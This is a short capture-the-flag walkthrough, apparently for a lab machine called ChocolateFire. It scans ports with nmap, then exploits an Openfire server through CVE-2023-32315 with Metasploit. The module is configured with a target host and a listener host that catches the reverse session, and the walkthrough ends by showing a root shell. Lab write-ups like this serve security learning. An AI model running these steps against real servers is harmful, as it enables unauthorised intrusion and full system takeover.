ChocolateFire
1. Network Enumeration
Performing a Full Port Scan
export TARGET_IP=172.17.0.3
sudo nmap -p- $TARGET_IP
Scan Results:
The scan identifies multiple open ports, including SSH (22/tcp) and several XMPP-related services:
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5222/tcp open xmpp-client
5223/tcp open hpvirtgrp
5262/tcp open unknown
5263/tcp open unknown
5269/tcp open xmpp-server
5270/tcp open xmp
5275/tcp open unknown
5276/tcp open unknown
7070/tcp open realserver
7777/tcp open cbt
9090/tcp open zeus-admin
2. Exploitation: Openfire Authentication Bypass (CVE-2023-32315)
Given the presence of Openfire, we check for known vulnerabilities. One such critical vulnerability is CVE-2023-32315, which allows for authentication bypass and remote code execution (RCE).
Using Metasploit to Exploit the Vulnerability
Metasploit contains an exploit module for this vulnerability. We proceed as follows:
-
Launch Metasploit:
msfconsole -q
-
Search for Openfire exploits:
msf6 > search openfire
-
Select the relevant exploit module:
msf6 > use exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315
-
Configure the exploit options:
msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > show options
msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set RHOSTS 172.17.0.3
msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set LHOST 172.17.0.1 -
Execute the exploit:
msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > run
Upon successful exploitation, we confirm root access:
id
# id=0(root) gid=0(root) groups=0(root)